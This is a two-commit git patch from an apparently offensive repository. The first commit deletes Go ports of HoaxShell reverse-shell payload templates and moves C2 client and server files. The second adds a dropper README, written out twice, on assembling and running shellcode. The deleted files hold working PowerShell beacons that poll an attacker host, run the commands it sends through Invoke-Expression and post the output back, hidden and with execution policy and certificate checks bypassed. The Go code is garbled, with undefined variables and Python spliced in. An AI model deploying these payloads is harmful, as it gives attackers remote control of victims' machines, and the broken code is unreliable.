From 78702313b6c52d00b494f14934298e27cea10914 Mon Sep 17 00:00:00 2001 From: xXIamNoOneXx <143564810+xXIamNoOneXx@users.noreply.github.com> Date: Mon, 4 Sep 2023 17:17:02 -0500 Subject: [PATCH 1/2] committed --- .github/FUNDING.yml | 13 -- .github/workflows/terraform.yml | 93 -------------- .../windows/hoaxshell/cmd_curl.go | 48 ------- .../windows/hoaxshell/cmd_curl_https.go | 48 ------- .../windows/hoaxshell/powershell_iex.go | 72 ----------- .../hoaxshell/powershell_iex_constr_lang.go | 72 ----------- .../windows/hoaxshell/powershell_iex_https.go | 120 ------------------ .../windows/hoaxshell/powershell_outfile.go | 84 ------------ .../powershell_outfile_constraint.go | 84 ------------ cistom_shell.asm => asm/cistom_shell.asm | 0 c2_client.py => client/c2_client.py | 0 simple_server.cpp => cpp/simple_server.cpp | 0 main.tf | 1 - c2_server.py => server/c2_server.py | 0 14 files changed, 635 deletions(-) delete mode 100644 .github/FUNDING.yml delete mode 100644 .github/workflows/terraform.yml delete mode 100644 Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/cmd_curl.go delete mode 100644 Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/cmd_curl_https.go delete mode 100644 Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex.go delete mode 100644 Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex_constr_lang.go delete mode 100644 Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex_https.go delete mode 100644 Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_outfile.go delete mode 100644 Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_outfile_constraint.go rename cistom_shell.asm => asm/cistom_shell.asm (100%) rename c2_client.py => client/c2_client.py (100%) rename simple_server.cpp => cpp/simple_server.cpp (100%) delete mode 100644 main.tf rename c2_server.py => server/c2_server.py (100%) diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml deleted file mode 100644 index 1e47970..0000000 --- a/.github/FUNDING.yml +++ /dev/null @@ -1,13 +0,0 @@ -# These are supported funding model platforms - -github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2] -patreon: # Replace with a single Patreon username -open_collective: # Replace with a single Open Collective username -ko_fi: # Replace with a single Ko-fi username -tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel -community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry -liberapay: # Replace with a single Liberapay username -issuehunt: # Replace with a single IssueHunt username -otechie: # Replace with a single Otechie username -lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry -custom: ['@CashApp $IamStillNoOne @John Smith', 'link2'] diff --git a/.github/workflows/terraform.yml b/.github/workflows/terraform.yml deleted file mode 100644 index 3b97a8e..0000000 --- a/.github/workflows/terraform.yml +++ /dev/null @@ -1,93 +0,0 @@ -# This workflow installs the latest version of Terraform CLI and configures the Terraform CLI configuration file -# with an API token for Terraform Cloud (app.terraform.io). On pull request events, this workflow will run -# `terraform init`, `terraform fmt`, and `terraform plan` (speculative plan via Terraform Cloud). On push events -# to the "main" branch, `terraform apply` will be executed. -# -# Documentation for `hashicorp/setup-terraform` is located here: https://github.com/hashicorp/setup-terraform -# -# To use this workflow, you will need to complete the following setup steps. -# -# 1. Create a `main.tf` file in the root of this repository with the `remote` backend and one or more resources defined. -# Example `main.tf`: -# # The configuration for the `remote` backend. -# terraform { -# backend "remote" { -# # The name of your Terraform Cloud organization. -# organization = "example-organization" -# -# # The name of the Terraform Cloud workspace to store Terraform state files in. -# workspaces { -# name = "example-workspace" -# } -# } -# } -# -# # An example resource that does nothing. -# resource "null_resource" "example" { -# triggers = { -# value = "A example resource that does nothing!" -# } -# } -# -# -# 2. Generate a Terraform Cloud user API token and store it as a GitHub secret (e.g. TF_API_TOKEN) on this repository. -# Documentation: -# - https://www.terraform.io/docs/cloud/users-teams-organizations/api-tokens.html -# - https://help.github.com/en/actions/configuring-and-managing-workflows/creating-and-storing-encrypted-secrets -# -# 3. Reference the GitHub secret in step using the `hashicorp/setup-terraform` GitHub Action. -# Example: -# - name: Setup Terraform -# uses: hashicorp/setup-terraform@v1 -# with: -# cli_config_credentials_token: ${{ secrets.TF_API_TOKEN }} - -name: 'Terraform' - -on: - push: - branches: [ "main" ] - pull_request: - -permissions: - contents: read - -jobs: - terraform: - name: 'Terraform' - runs-on: ubuntu-latest - environment: production - - # Use the Bash shell regardless whether the GitHub Actions runner is ubuntu-latest, macos-latest, or windows-latest - defaults: - run: - shell: bash - - steps: - # Checkout the repository to the GitHub Actions runner - - name: Checkout - uses: actions/checkout@v3 - - # Install the latest version of Terraform CLI and configure the Terraform CLI configuration file with a Terraform Cloud user API token - - name: Setup Terraform - uses: hashicorp/setup-terraform@v1 - with: - cli_config_credentials_token: ${{ secrets.TF_API_TOKEN }} - - # Initialize a new or existing Terraform working directory by creating initial files, loading any remote state, downloading modules, etc. - - name: Terraform Init - run: terraform init - - # Checks that all Terraform configuration files adhere to a canonical format - - name: Terraform Format - run: terraform fmt -check - - # Generates an execution plan for Terraform - - name: Terraform Plan - run: terraform plan -input=false - - # On push to "main", build or change infrastructure according to Terraform configuration files - # Note: It is recommended to set up a required "strict" status check in your repository for "Terraform Cloud". See the documentation on "strict" required status checks for more information: https://help.github.com/en/github/administering-a-repository/types-of-required-status-checks - - name: Terraform Apply - if: github.ref == 'refs/heads/"main"' && github.event_name == 'push' - run: terraform apply -auto-approve -input=false diff --git a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/cmd_curl.go b/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/cmd_curl.go deleted file mode 100644 index d331cd7..0000000 --- a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/cmd_curl.go +++ /dev/null @@ -1,48 +0,0 @@ -package main - -import ( - "fmt" - "os" - "os/exec" - "strings" - "time" -) - -var info = map[string]string{ - "Title": "Windows CMD cURL HoaxShell", - "Author": "Panagiotis Chartas (t3l3machus)", - "Description": "An Http based beacon-like reverse shell that utilizes cURL", - "References": "https://github.com/t3l3machus/hoaxshell, https://revshells.com", -} - -var meta = map[string]string{ - "handler": "hoaxshell", - "type": "cmd-curl", - "os": "windows", - "shell": "cmd.exe", -} - -var config = map[string]int{ - "frequency": 1, -} - -var parameters = map[string]interface{}{ - "lhost": nil, -} - -var attrs = map[string]interface{}{} - -func main() { - lhost := parameters["lhost"].(string) - ip := strings.Replace(data, "*LHOST*", lhost, -1) - cmd := exec.Command("cmd", "/C", ip) - cmd.Stdout = os.Stdout - cmd.Stderr = os.Stderr - cmd.Run() - - frequency := config["frequency"] - for { - cmd := exec.Command("timeout", "/T", fmt.Sprintf("%d", frequency)) - cmd.Run() - } -} diff --git a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/cmd_curl_https.go b/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/cmd_curl_https.go deleted file mode 100644 index 098ac9e..0000000 --- a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/cmd_curl_https.go +++ /dev/null @@ -1,48 +0,0 @@ -package main - -import ( - "fmt" - "os" - "os/exec" - "strings" - "time" -) - -var info = map[string]string{ - "Title": "Windows CMD cURL HoaxShell https", - "Author": "Panagiotis Chartas (t3l3machus)", - "Description": "An Https based beacon-like reverse shell that utilizes cURL", - "References": "https://github.com/t3l3machus/hoaxshell, https://revshells.com", -} - -var meta = map[string]string{ - "handler": "hoaxshell", - "type": "cmd-curl-ssl", - "os": "windows", - "shell": "cmd.exe", -} - -var config = map[string]int{ - "frequency": 1, -} - -var parameters = map[string]interface{}{ - "lhost": nil, -} - -var attrs = map[string]interface{}{} - -func main() { - lhost := parameters["lhost"].(string) - ip := strings.Replace(data, "*LHOST*", lhost, -1) - cmd := exec.Command("cmd", "/C", ip) - cmd.Stdout = os.Stdout - cmd.Stderr = os.Stderr - cmd.Run() - - frequency := config["frequency"] - for { - cmd := exec.Command("timeout", "/T", fmt.Sprintf("%d", frequency)) - cmd.Run() - } -} diff --git a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex.go b/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex.go deleted file mode 100644 index 6313e90..0000000 --- a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex.go +++ /dev/null @@ -1,72 +0,0 @@ -package main - -import ( - "fmt" - "os" - "os/exec" - "strings" - "time" -) - -var info = map[string]string{ - "Title": "Windows PowerShell IEX HoaxShell", - "Author": "Panagiotis Chartas (t3l3machus)", - "Description": "An Http based beacon-like reverse shell that utilizes IEX", - "References": "https://github.com/t3l3machus/hoaxshell, https://revshells.com", -} - -var meta = map[string]string{ - "handler": "hoaxshell", - "type": "ps-iex", - "os": "windows", - "shell": "powershell.exe", -} - -var config = map[string]float64{ - "frequency": 0.8, -} - -var parameters = map[string]interface{}{ - "lhost": nil, -} - -var attrs = map[string]interface{}{ - "obfuscate": true, - "encode": true, -} - -var data = ` -Start-Process $env:windir\sysnative\WindowsPowerShell\v1.0\powershell.exe -ArgumentList { - $ConfirmPreference="None"; - $s='*LHOST*'; - $i='*SESSIONID*'; - $p='http://'; - $v=Invoke-RestMethod -UseBasicParsing -Uri "$p$s/*VERIFY*/$env:COMPUTERNAME/$env:USERNAME" -Headers @{"*HOAXID*"=$i}; - for (;;) { - $c=(Invoke-RestMethod -UseBasicParsing -Uri "$p$s/*GETCMD*" -Headers @{"*HOAXID*"=$i}); - if ($c -ne 'None') { - $r=Invoke-Expression $c -ErrorAction Stop -ErrorVariable e; - $r=Out-String -InputObject $r; - $x=Invoke-RestMethod -Uri "$p$s/*POSTRES*" -Method POST -Headers @{"*HOAXID*"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ') - } - Start-Sleep -Seconds *FREQ* - } -} -WindowStyle Hidden -` - -func main() { - lhost := parameters["lhost"].(string) - data := strings.Replace(data, "*LHOST*", lhost, -1) - data := strings.Replace(data, "*SESSIONID*", "session123", -1) // Replace with actual session ID - - cmd := exec.Command("powershell", "-NoProfile", "-ExecutionPolicy", "Bypass", "-Command", data) - cmd.Stdout = os.Stdout - cmd.Stderr = os.Stderr - cmd.Run() - - frequency := config["frequency"] - for { - cmd := exec.Command("timeout", "/T", fmt.Sprintf("%.0f", frequency)) - cmd.Run() - } -} diff --git a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex_constr_lang.go b/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex_constr_lang.go deleted file mode 100644 index 604d5d2..0000000 --- a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex_constr_lang.go +++ /dev/null @@ -1,72 +0,0 @@ -package main - -import ( - "fmt" - "os" - "os/exec" - "strings" - "time" -) - -var info = map[string]string{ - "Title": "Windows PowerShell IEX HoaxShell - Constraint Language Mode", - "Author": "Panagiotis Chartas (t3l3machus)", - "Description": "An Http based beacon-like reverse shell that utilizes IEX and will work even if Constraint Language Mode is enabled on the victim", - "References": "https://github.com/t3l3machus/hoaxshell, https://revshells.com", -} - -var meta = map[string]string{ - "handler": "hoaxshell", - "type": "ps-iex-cm", - "os": "windows", - "shell": "powershell.exe", -} - -var config = map[string]float64{ - "frequency": 0.8, -} - -var parameters = map[string]interface{}{ - "lhost": nil, -} - -var attrs = map[string]interface{}{ - "obfuscate": true, - "encode": true, -} - -var data = ` -Start-Process $env:windir\sysnative\WindowsPowerShell\v1.0\powershell.exe -ArgumentList { - $ConfirmPreference='None'; - $s='*LHOST*'; - $i='*SESSIONID*'; - $p='http://'; - $v=Invoke-RestMethod -UseBasicParsing -Uri "$p$s/*VERIFY*/$env:COMPUTERNAME/$env:USERNAME" -Headers @{"*HOAXID*"=$i}; - for (;;) { - $c=(Invoke-RestMethod -UseBasicParsing -Uri "$p$s/*GETCMD*" -Headers @{"*HOAXID*"=$i}); - if ($c -ne 'None') { - $r=Invoke-Expression $c -ErrorAction Stop -ErrorVariable e; - $r=Out-String -InputObject $r; - $x=Invoke-RestMethod -Uri "$p$s/*POSTRES*" -Method POST -Headers @{"*HOAXID*"=$i} -Body ($e+$r) - } - Start-Sleep -Seconds *FREQ* - } -} -WindowStyle Hidden -` - -func main() { - lhost := parameters["lhost"].(string) - data := strings.Replace(data, "*LHOST*", lhost, -1) - data := strings.Replace(data, "*SESSIONID*", "session123", -1) // Replace with actual session ID - - cmd := exec.Command("powershell", "-NoProfile", "-ExecutionPolicy", "Bypass", "-Command", data) - cmd.Stdout = os.Stdout - cmd.Stderr = os.Stderr - cmd.Run() - - frequency := config["frequency"] - for { - cmd := exec.Command("timeout", "/T", fmt.Sprintf("%.0f", frequency)) - cmd.Run() - } -} diff --git a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex_https.go b/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex_https.go deleted file mode 100644 index 0b4764e..0000000 --- a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex_https.go +++ /dev/null @@ -1,120 +0,0 @@ -# This module is part of the Villain framework - -class Payload: - - info = { - 'Title' : 'Windows PowerShell IEX HoaxShell https', - 'Author' : 'Panagiotis Chartas (t3l3machus)', - 'Description' : 'An Https based beacon-like reverse shell that utilizes IEX', - 'References' : ['https://github.com/t3l3machus/hoaxshell', 'https://revshells.com']package main - -import ( - "fmt" - "os" - "os/exec" - "strings" - "time" -) - -var info = map[string]string{ - "Title": "Windows PowerShell IEX HoaxShell https", - "Author": "Panagiotis Chartas (t3l3machus)", - "Description": "An Https based beacon-like reverse shell that utilizes IEX", - "References": "https://github.com/t3l3machus/hoaxshell, https://revshells.com", -} - -var meta = map[string]string{ - "handler": "hoaxshell", - "type": "ps-iex-ssl", - "os": "windows", - "shell": "powershell.exe", -} - -var config = map[string]float64{ - "frequency": 0.8, -} - -var parameters = map[string]interface{}{ - "lhost": nil, -} - -var attrs = map[string]interface{}{ - "obfuscate": true, - "encode": true, -} - -var data = ` -Start-Process $env:windir\sysnative\WindowsPowerShell\v1.0\powershell.exe -ArgumentList { - add-type @" - using System.Net;using System.Security.Cryptography.X509Certificates; - public class TrustAllCertsPolicy : ICertificatePolicy { - public bool CheckValidationResult( - ServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) { - return true; - } - } - "@ - [System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy - $ConfirmPreference="None"; - $s='*LHOST*'; - $i='*SESSIONID*'; - $p='https://'; - $v=Invoke-RestMethod -UseBasicParsing -Uri "$p$s/*VERIFY*/$env:COMPUTERNAME/$env:USERNAME" -Headers @{"*HOAXID*"=$i}; - for (;;) { - $c=(Invoke-RestMethod -UseBasicParsing -Uri "$p$s/*GETCMD*" -Headers @{"*HOAXID*"=$i}); - if ($c -ne 'None') { - $r=iex $c -ErrorAction Stop -ErrorVariable e; - $r=Out-String -InputObject $r; - $x=Invoke-RestMethod -Uri "$p$s/*POSTRES*" -Method POST -Headers @{"*HOAXID*"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ') - } - Start-Sleep -Seconds *FREQ* - } -} -WindowStyle Hidden -` - -func main() { - lhost := parameters["lhost"].(string) - data := strings.Replace(data, "*LHOST*", lhost, -1) - data := strings.Replace(data, "*SESSIONID*", "session123", -1) // Replace with actual session ID - - cmd := exec.Command("powershell", "-NoProfile", "-ExecutionPolicy", "Bypass", "-Command", data) - cmd.Stdout = os.Stdout - cmd.Stderr = os.Stderr - cmd.Run() - - frequency := config["frequency"] - for { - cmd := exec.Command("timeout", "/T", fmt.Sprintf("%.0f", frequency)) - cmd.Run() - } -} - - } - - meta = { - 'handler' : 'hoaxshell', - 'type' : 'ps-iex-ssl', - 'os' : 'windows', - 'shell' : 'powershell.exe' - } - - config = { - 'frequency' : 0.8 - } - - parameters = { - 'lhost' : None - } - - attrs = { - 'obfuscate' : True, - 'encode' : True - } - - data = '''Start-Process $PSHOME\powershell.exe -ArgumentList {add-type @" -using System.Net;using System.Security.Cryptography.X509Certificates; -public class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult( -ServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}} -"@ -[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy -$ConfirmPreference="None";$s=\'*LHOST*\';$i=\'*SESSIONID*\';$p=\'https://\';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/*VERIFY*/$env:COMPUTERNAME/$env:USERNAME -Headers @{"*HOAXID*"=$i};for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/*GETCMD* -Headers @{"*HOAXID*"=$i});if ($c -ne \'None\') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$x=Invoke-RestMethod -Uri $p$s/*POSTRES* -Method POST -Headers @{"*HOAXID*"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join \' \')} sleep *FREQ*}} -WindowStyle Hidden''' diff --git a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_outfile.go b/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_outfile.go deleted file mode 100644 index 18c328b..0000000 --- a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_outfile.go +++ /dev/null @@ -1,84 +0,0 @@ -package main - -import ( - "fmt" - "io/ioutil" - "os" - "os/exec" - "strings" - "time" -) - -var info = map[string]string{ - "Title": "Windows PowerShell outfile HoaxShell", - "Author": "Panagiotis Chartas (t3l3machus)", - "Description": "An Http based beacon-like reverse shell that writes and executes commands from disc", - "References": "https://github.com/t3l3machus/hoaxshell, https://revshells.com", -} - -var meta = map[string]string{ - "handler": "hoaxshell", - "type": "ps-outfile", - "os": "windows", - "shell": "powershell.exe", -} - -var config = map[string]float64{ - "frequency": 0.8, -} - -var parameters = map[string]interface{}{ - "lhost": nil, -} - -var attrs = map[string]interface{}{ - "obfuscate": true, - "encode": true, -} - -var data = ` -Start-Process $env:windir\sysnative\WindowsPowerShell\v1.0\powershell.exe -ArgumentList { - $ConfirmPreference='None'; - $s='*LHOST*'; - $i='*SESSIONID*'; - $p='http://'; - $v=Invoke-RestMethod -UseBasicParsing -Uri "$p$s/*VERIFY*/$env:COMPUTERNAME/$env:USERNAME" -Headers @{"*HOAXID*"=$i}; - for (;;) { - $c=(Invoke-RestMethod -UseBasicParsing -Uri "$p$s/*GETCMD*" -Headers @{"*HOAXID*"=$i}); - if (!(@('None','quit') -contains $c)) { - $c | Out-File -FilePath "*OUTFILE*"; - $r=powershell -ep bypass *OUTFILE* -ErrorAction Stop -ErrorVariable e; - $r=Out-String -InputObject $r; - $x=Invoke-RestMethod -Uri "$p$s/*POSTRES*" -Method POST -Headers @{"*HOAXID*"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ') - } elseif ($c -eq 'quit') { - Remove-Item "*OUTFILE*"; - Stop-Process $PID - } - Start-Sleep -Seconds *FREQ* - } -} -WindowStyle Hidden -` - -func main() { - lhost := parameters["lhost"].(string) - data := strings.Replace(data, "*LHOST*", lhost, -1) - data := strings.Replace(data, "*SESSIONID*", "session123", -1) // Replace with actual session ID - - // Define the path for the outfile - outfilePath := "C:\\Users\\" + os.Getenv("USERNAME") + "\\.local\\haxor.ps1" - data = strings.Replace(data, "*OUTFILE*", outfilePath, -1) - - // Create the outfile and write the data - ioutil.WriteFile(outfilePath, []byte(data), 0644) - - cmd := exec.Command("powershell", "-NoProfile", "-ExecutionPolicy", "Bypass", "-Command", data) - cmd.Stdout = os.Stdout - cmd.Stderr = os.Stderr - cmd.Run() - - frequency := config["frequency"] - for { - cmd := exec.Command("timeout", "/T", fmt.Sprintf("%.0f", frequency)) - cmd.Run() - } -} diff --git a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_outfile_constraint.go b/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_outfile_constraint.go deleted file mode 100644 index 6255273..0000000 --- a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_outfile_constraint.go +++ /dev/null @@ -1,84 +0,0 @@ -package main - -import ( - "fmt" - "io/ioutil" - "os" - "os/exec" - "strings" - "time" -) - -var info = map[string]string{ - "Title": "Windows PowerShell outfile HoaxShell - Constraint Language Mode", - "Author": "Panagiotis Chartas (t3l3machus)", - "Description": "An Http based beacon-like reverse shell that writes and executes commands from disc and will work even if Constraint Language Mode is enabled on the victim", - "References": "https://github.com/t3l3machus/hoaxshell, https://revshells.com", -} - -var meta = map[string]string{ - "handler": "hoaxshell", - "type": "ps-outfile-cm", - "os": "windows", - "shell": "powershell.exe", -} - -var config = map[string]float64{ - "frequency": 0.8, -} - -var parameters = map[string]interface{}{ - "lhost": nil, -} - -var attrs = map[string]interface{}{ - "obfuscate": true, - "encode": true, -} - -var data = ` -Start-Process $env:windir\sysnative\WindowsPowerShell\v1.0\powershell.exe -ArgumentList { - $ConfirmPreference='None'; - $s='*LHOST*'; - $i='*SESSIONID*'; - $p='http://'; - $v=Invoke-RestMethod -UseBasicParsing -Uri "$p$s/*VERIFY*/$env:COMPUTERNAME/$env:USERNAME" -Headers @{"*HOAXID*"=$i}; - for (;;) { - $c=(Invoke-RestMethod -UseBasicParsing -Uri "$p$s/*GETCMD*" -Headers @{"*HOAXID*"=$i}); - if (!(@('None','quit') -contains $c)) { - $c | Out-File -FilePath "*OUTFILE*"; - $r=powershell -ep bypass *OUTFILE* -ErrorAction Stop -ErrorVariable e; - $r=Out-String -InputObject $r; - $x=Invoke-RestMethod -Uri "$p$s/*POSTRES*" -Method POST -Headers @{"*HOAXID*"=$i} -Body ($e+$r) - } elseif ($c -eq 'quit') { - Remove-Item "*OUTFILE*"; - Stop-Process $PID - } - Start-Sleep -Seconds *FREQ* - } -} -WindowStyle Hidden -` - -func main() { - lhost := parameters["lhost"].(string) - data := strings.Replace(data, "*LHOST*", lhost, -1) - data := strings.Replace(data, "*SESSIONID*", "session123", -1) // Replace with actual session ID - - // Define the path for the outfile - outfilePath := "C:\\Users\\" + os.Getenv("USERNAME") + "\\.local\\haxor.ps1" - data = strings.Replace(data, "*OUTFILE*", outfilePath, -1) - - // Create the outfile and write the data - ioutil.WriteFile(outfilePath, []byte(data), 0644) - - cmd := exec.Command("powershell", "-NoProfile", "-ExecutionPolicy", "Bypass", "-Command", data) - cmd.Stdout = os.Stdout - cmd.Stderr = os.Stderr - cmd.Run() - - frequency := config["frequency"] - for { - cmd := exec.Command("timeout", "/T", fmt.Sprintf("%.0f", frequency)) - cmd.Run() - } -} diff --git a/cistom_shell.asm b/asm/cistom_shell.asm similarity index 100% rename from cistom_shell.asm rename to asm/cistom_shell.asm diff --git a/c2_client.py b/client/c2_client.py similarity index 100% rename from c2_client.py rename to client/c2_client.py diff --git a/simple_server.cpp b/cpp/simple_server.cpp similarity index 100% rename from simple_server.cpp rename to cpp/simple_server.cpp diff --git a/main.tf b/main.tf deleted file mode 100644 index 8b13789..0000000 --- a/main.tf +++ /dev/null @@ -1 +0,0 @@ - diff --git a/c2_server.py b/server/c2_server.py similarity index 100% rename from c2_server.py rename to server/c2_server.py From 6e9318dd5bfd3ea47bd68a7aa210b272cf6bf886 Mon Sep 17 00:00:00 2001 From: xXIamNoOneXx <143564810+xXIamNoOneXx@users.noreply.github.com> Date: Mon, 4 Sep 2023 17:21:04 -0500 Subject: [PATCH 2/2] added dropper readme --- README-dropper.md | 123 ++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 123 insertions(+) create mode 100644 README-dropper.md diff --git a/README-dropper.md b/README-dropper.md new file mode 100644 index 0000000..c12a47f --- /dev/null +++ b/README-dropper.md @@ -0,0 +1,123 @@ +Here's how you can assemble and link the assembly files: + + Save the Assembly Code: + + Save your dropper.asm and shellcode.asm files with the code you want to use. + + Assemble the Code: + + Open your terminal and navigate to the directory where your assembly files are located. + + To assemble each assembly file, use the as (GNU Assembler) command: + + bash + +as -o dropper.o dropper.asm +as -o shellcode.o shellcode.asm + +This command assembles the code in dropper.asm and shellcode.asm and generates object files (dropper.o and shellcode.o). + +Link the Code: + +Once you have the object files, you can link them into an executable. Create a linker script (e.g., linker.ld) to specify the entry point: + +ld + +ENTRY(_start) + +SECTIONS { + . = 0x08048000; /* This is the default ELF load address for executables */ + + .text : { + *(.text) + } + + .data : { + *(.data) + } + + .bss : { + *(.bss) + } +} + +Now, link the object files using the linker: + +bash + +ld -T linker.ld -o dropper dropper.o shellcode.o + +This command links the object files into an executable named dropper. + +Run the Executable: + +You can now run the dropper executable: + +bash + + ./dropper + + This will execute your custom shellcode. + +Please adapt the above steps as needed for your specific environment and requirements. Note that the above commands are for a Linux environment, and the process may differ if you are working on Windows or another platformHere's how you can assemble and link the assembly files: + + Save the Assembly Code: + + Save your dropper.asm and shellcode.asm files with the code you want to use. + + Assemble the Code: + + Open your terminal and navigate to the directory where your assembly files are located. + + To assemble each assembly file, use the as (GNU Assembler) command: + + bash + +as -o dropper.o dropper.asm +as -o shellcode.o shellcode.asm + +This command assembles the code in dropper.asm and shellcode.asm and generates object files (dropper.o and shellcode.o). + +Link the Code: + +Once you have the object files, you can link them into an executable. Create a linker script (e.g., linker.ld) to specify the entry point: + +ld + +ENTRY(_start) + +SECTIONS { + . = 0x08048000; /* This is the default ELF load address for executables */ + + .text : { + *(.text) + } + + .data : { + *(.data) + } + + .bss : { + *(.bss) + } +} + +Now, link the object files using the linker: + +bash + +ld -T linker.ld -o dropper dropper.o shellcode.o + +This command links the object files into an executable named dropper. + +Run the Executable: + +You can now run the dropper executable: + +bash + + ./dropper + + This will execute your custom shellcode. + +Please adapt the above steps as needed for your specific environment and requirements. Note that the above commands are for a Linux environment, and the process may differ if you are working on Windows or another platform \ No newline at end of file